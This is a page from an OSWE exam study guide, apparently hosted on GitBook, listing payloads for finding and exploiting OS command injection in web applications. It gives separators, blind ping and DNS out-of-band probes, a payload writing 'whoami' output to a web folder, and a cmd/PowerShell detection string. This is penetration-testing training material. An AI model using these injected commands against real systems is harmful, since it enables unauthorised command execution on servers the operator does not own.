💻
OSWE Everything
💻
OSWE Everything
  • VULNERABILITIES
    • Type Juggling
    • Cross Site Scripting
      • Hunting for files
    • Insecure Deserialization
      • .NET
    • SQL Injection
      • Blind SQL Injection
      • SQLi debugging
      • Code review
      • Errors and additional information
      • Approaches to leverage different databases
    • XML External Entity (XXE)
      • Types of XML Entities
      • Exploitation
      • Wrappers for errors
      • Post Exploitation
    • OS Command Injection
      • Exploitation
    • Server Side Template Injection
      • Exploitation
    • Authentication Bypass
      • Checklist
  • Unsecure Random Function
    • Exploitation
  • Cross Origin Resource Sharing (CORS)
    • Prerequisites of Exploitation
  • Client Side Request Forgery (CSRF)
    • Prerequisites of Exploitation
  • Exploit Writing
    • Cheatsheet
    • Skeleton Scripts
  • Code review
    • Manual code review
      • Routing
      • Searching for exploits
      • Debugging
    • Decompilation
      • Java
      • .NET
    • Managing the application
      • Identifying application file location
      • Restarting web applications
      • Manipulation of Assembly Attributes for Debugging (.NET)
  • Preparation Machines
    • [HTB] Vault
    • Other HTB scripts
  • ADDITIONAL INFORMATION
    • Sources
  • External Resources
    • WhiteBox Pentest
Powered by GitBook
On this page
  1. VULNERABILITIES
  2. OS Command Injection

Exploitation

Do not forget to use urlencoding

Reflected

& echo test123 &

Blind

& ping -c 10 127.0.0.1 &

Blind (ping rce listener)

Kali:

tcpdump -i <NETWORK_CARD> icmp

Victim:

& ping <KALI_IP> &

BLIND OAST

& nslookup collaborator-link.net &

Blind redirecting the input

& whoami > /var/www/static/whoami.txt &

Command seperators

Copy

&
&&
|
||

More command seperators

Copy

Newline (0x0a or \n)
;

Inline Command Execution (Linux)

Copy

`command`
$(command)

Check if command is executed via cmd or powershell

Copy

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell
PreviousOS Command InjectionNextServer Side Template Injection

Last updated 1 month ago